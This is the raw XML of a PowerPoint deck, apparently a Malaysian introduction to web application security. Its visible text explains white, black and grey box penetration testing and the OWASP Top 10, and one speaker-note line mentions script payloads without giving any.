    <dgm:pt modelId="{10E7A542-6D5E-4865-A484-4F027EAB91EB}" type="sibTrans" cxnId="{C713D045-5A27-493E-928E-F57F11A3BECB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A78512F0-BF71-4DF6-AC94-CEFA92A5FB21}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>Companies should </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>adopt</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t> this document and start the process of ensuring that their web applications </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>minimize these risks</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1826C401-3B98-459D-8BC0-DEDBFE4F6CD2}" type="parTrans" cxnId="{DA815C0A-D6FA-46C3-9B1C-30F2D2B52AE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32A7DBF4-A468-4BBD-89BB-AE04A8DBCDF2}" type="sibTrans" cxnId="{DA815C0A-D6FA-46C3-9B1C-30F2D2B52AE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{097BBB4E-4D54-4DAE-BA9D-21F8BEBADF75}" type="pres">
      <dgm:prSet presAssocID="{9E10DFE3-5D3A-4677-9062-80AD679CDD25}" presName="composite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{64B9D662-3F4A-4334-9EB9-FF7E09936A4B}" type="pres">
      <dgm:prSet presAssocID="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" presName="roof" presStyleLbl="dkBgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7F8B837-E2EA-47A6-8875-9510C0ACF051}" type="pres">
      <dgm:prSet presAssocID="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" presName="pillars" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0532DE2A-4447-490E-9A33-257CF9BF08F5}" type="pres">
      <dgm:prSet presAssocID="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" presName="pillar1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CCE70D7E-7473-4299-B51D-1A937E3FD630}" type="pres">
      <dgm:prSet presAssocID="{8B2219EE-210D-426F-BF1D-137081F916F1}" presName="pillarX" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0ABD5560-7F33-4132-B3CB-B68F1A5549C2}" type="pres">
      <dgm:prSet presAssocID="{A78512F0-BF71-4DF6-AC94-CEFA92A5FB21}" presName="pillarX" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3C6B8EE-B3DD-4233-BDAA-645015BBF16B}" type="pres">
      <dgm:prSet presAssocID="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" presName="base" presStyleLbl="dkBgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{DA815C0A-D6FA-46C3-9B1C-30F2D2B52AE3}" srcId="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" destId="{A78512F0-BF71-4DF6-AC94-CEFA92A5FB21}" srcOrd="2" destOrd="0" parTransId="{1826C401-3B98-459D-8BC0-DEDBFE4F6CD2}" sibTransId="{32A7DBF4-A468-4BBD-89BB-AE04A8DBCDF2}"/>
    <dgm:cxn modelId="{6FF15118-3A2D-49BF-A533-A525A4367506}" type="presOf" srcId="{0D3BD204-8464-4D23-B363-147721D63B5F}" destId="{0532DE2A-4447-490E-9A33-257CF9BF08F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{30CC7062-285B-4687-9BC7-11A583C484CF}" srcId="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" destId="{0D3BD204-8464-4D23-B363-147721D63B5F}" srcOrd="0" destOrd="0" parTransId="{A0279B4B-6CBC-48D6-BC84-05CCFAE5A892}" sibTransId="{5FF2B386-A774-4F6E-96A9-A1D9388A02D6}"/>
    <dgm:cxn modelId="{C713D045-5A27-493E-928E-F57F11A3BECB}" srcId="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" destId="{8B2219EE-210D-426F-BF1D-137081F916F1}" srcOrd="1" destOrd="0" parTransId="{9476FA12-87CA-439C-8E71-CC6367446D6B}" sibTransId="{10E7A542-6D5E-4865-A484-4F027EAB91EB}"/>
    <dgm:cxn modelId="{60F1F38C-4FB6-41DF-BCF6-AD43CB8A2D5B}" srcId="{9E10DFE3-5D3A-4677-9062-80AD679CDD25}" destId="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" srcOrd="0" destOrd="0" parTransId="{9AFB1E61-5E21-4DC3-B8E7-EEA3B3EEF1CF}" sibTransId="{E6D6FDE4-2B6B-45BE-BC31-3307870DE2AD}"/>
    <dgm:cxn modelId="{3EE54992-39A9-4B7E-8566-89336B20B47E}" type="presOf" srcId="{A78512F0-BF71-4DF6-AC94-CEFA92A5FB21}" destId="{0ABD5560-7F33-4132-B3CB-B68F1A5549C2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{BF972F9D-8120-4831-A159-DBA998891C55}" type="presOf" srcId="{8B2219EE-210D-426F-BF1D-137081F916F1}" destId="{CCE70D7E-7473-4299-B51D-1A937E3FD630}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{DB80C4A0-BDA0-493F-B03B-FE172A704CC6}" type="presOf" srcId="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}" destId="{64B9D662-3F4A-4334-9EB9-FF7E09936A4B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{15636EAC-1407-4DBF-8413-4C02A12FB2B3}" type="presOf" srcId="{9E10DFE3-5D3A-4677-9062-80AD679CDD25}" destId="{097BBB4E-4D54-4DAE-BA9D-21F8BEBADF75}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{FB33BA7E-57FC-4B7A-BEF3-5223D04177B4}" type="presParOf" srcId="{097BBB4E-4D54-4DAE-BA9D-21F8BEBADF75}" destId="{64B9D662-3F4A-4334-9EB9-FF7E09936A4B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{E4722293-3702-4D65-AAD6-F935DF9A1AA8}" type="presParOf" srcId="{097BBB4E-4D54-4DAE-BA9D-21F8BEBADF75}" destId="{F7F8B837-E2EA-47A6-8875-9510C0ACF051}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{82ED9897-46D7-4D44-B7AB-923B003B0F4E}" type="presParOf" srcId="{F7F8B837-E2EA-47A6-8875-9510C0ACF051}" destId="{0532DE2A-4447-490E-9A33-257CF9BF08F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{5C6809A8-57F1-4537-9673-FB413646E769}" type="presParOf" srcId="{F7F8B837-E2EA-47A6-8875-9510C0ACF051}" destId="{CCE70D7E-7473-4299-B51D-1A937E3FD630}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{C0F70ABC-FC82-4C0E-B551-88B45F35794B}" type="presParOf" srcId="{F7F8B837-E2EA-47A6-8875-9510C0ACF051}" destId="{0ABD5560-7F33-4132-B3CB-B68F1A5549C2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList3"/>
    <dgm:cxn modelId="{4EBDFD83-141C-4CD0-8CC5-AB62256D7DBF}" type="presParOf" srcId="{097BBB4E-4D54-4DAE-BA9D-21F8BEBADF75}" destId="{B3C6B8EE-B3DD-4233-BDAA-645015BBF16B}"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D46A0-92ED-4182-8190-3E25C085DF2D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="9227"/>
          <a:ext cx="10779126" cy="678600"/>
        </a:xfrm>
        <a:prstGeom prst="round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MY" sz="2900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>White Box</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33127" y="42354"/>
        <a:ext cx="10712872" cy="612346"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{100D3333-C5B3-4D4D-8FF8-6261EEB4539E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="687827"/>
          <a:ext cx="10779126" cy="69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237"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Tester has complete access and in-depth knowledge of the system. Access to source code is usually given.</a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="687827"/>
        <a:ext cx="10779126" cy="690344"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7967C015-4E00-4716-B659-12B8E84F09BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1378172"/>
          <a:ext cx="10779126" cy="678600"/>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MY" sz="2900" kern="1200" dirty="0"/>
            <a:t>Black Box</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33127" y="1411299"/>
        <a:ext cx="10712872" cy="612346"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{25FF7226-31ED-4ED6-9386-9FC84DFB7413}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2056772"/>
          <a:ext cx="10779126" cy="69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237"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Tester is given little to no information about the system. Just the URL of the application is usually given.</a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2056772"/>
        <a:ext cx="10779126" cy="690344"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{307ED9BF-7CDD-4B86-A756-4C9F19DE2DE2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2747117"/>
          <a:ext cx="10779126" cy="678600"/>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MY" sz="2900" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Grey Box</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33127" y="2780244"/>
        <a:ext cx="10712872" cy="612346"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FA46E59C-A290-4239-9C4D-B12D8BED78E0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3425717"/>
          <a:ext cx="10779126" cy="69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237"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a:t>Combination of white box and black box penetration testing. Limited information and access is given to the tester.</a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3425717"/>
        <a:ext cx="10779126" cy="690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9D662-3F4A-4334-9EB9-FF7E09936A4B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="11468100" cy="1625600"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="dk2">
            <a:shade val="80000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
        <a:scene3d>
          <a:camera prst="orthographicFront"/>
          <a:lightRig rig="chilly" dir="t"/>
        </a:scene3d>
        <a:sp3d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endParaRPr lang="en-MY" sz="4000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="11468100" cy="1625600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0532DE2A-4447-490E-9A33-257CF9BF08F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5599" y="1625600"/>
          <a:ext cx="3818966" cy="341376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The OWASP Top 10 is a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>standard awareness document </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>for developers and web application security. </a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="1800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-MY" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5599" y="1625600"/>
        <a:ext cx="3818966" cy="3413760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CCE70D7E-7473-4299-B51D-1A937E3FD630}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3824566" y="1625600"/>
          <a:ext cx="3818966" cy="341376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It represents a broad consensus about the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>most critical security risks </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>to web applications.</a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="1800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-MY" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3824566" y="1625600"/>
        <a:ext cx="3818966" cy="3413760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0ABD5560-7F33-4132-B3CB-B68F1A5549C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7643533" y="1625600"/>
          <a:ext cx="3818966" cy="341376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Companies should </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>adopt</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t> this document and start the process of ensuring that their web applications </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>minimize these risks</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7643533" y="1625600"/>
        <a:ext cx="3818966" cy="3413760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B3C6B8EE-B3DD-4233-BDAA-645015BBF16B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5039360"/>
          <a:ext cx="11468100" cy="379306"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="dk2">
            <a:shade val="80000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
        <a:scene3d>
          <a:camera prst="orthographicFront"/>
          <a:lightRig rig="chilly" dir="t"/>
        </a:scene3d>
        <a:sp3d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1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2050744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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3478908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CB62E-620F-9AFD-4B36-AB2B3C6A20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59805E-829E-F457-3F23-4204DE482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CE8362-DF3C-7648-F0FE-CB9E49085068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBD2D17-C540-EDAE-3199-BD5A1664A11F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3050011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6DEEF-DD71-BC15-3D0D-A2DEDCA69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B1E7A-52B9-2912-915B-2124C8DC2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674BD-04F5-DD37-F995-A3EC3BEE3ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t> script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354C5117-2CF9-C3FC-7862-3DD225AB6476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116464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4292B-C84D-78DD-9FF9-1AF44EB84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BA4E5-BE9C-01EA-1096-022D941D4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C5703-F570-97CF-F291-F1D2D97507FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72BF02F0-46BE-F7C5-A31C-FDF8E8C56AB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2301829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AF939-8A94-5E34-7087-EC79D9615F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B4088D-5BAE-99B9-AC9D-683740B4E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3B901-3821-FDF1-27CE-611644F9BAD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB1C612-1A40-8A96-6CA5-9BB9A1075847}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92545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1CAB8-45F3-B848-FCCE-52BCFC406D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E773A-3CF6-78C5-8E6D-F6F755D0F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A677A-2C56-9C10-2661-E635C3F7F6FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
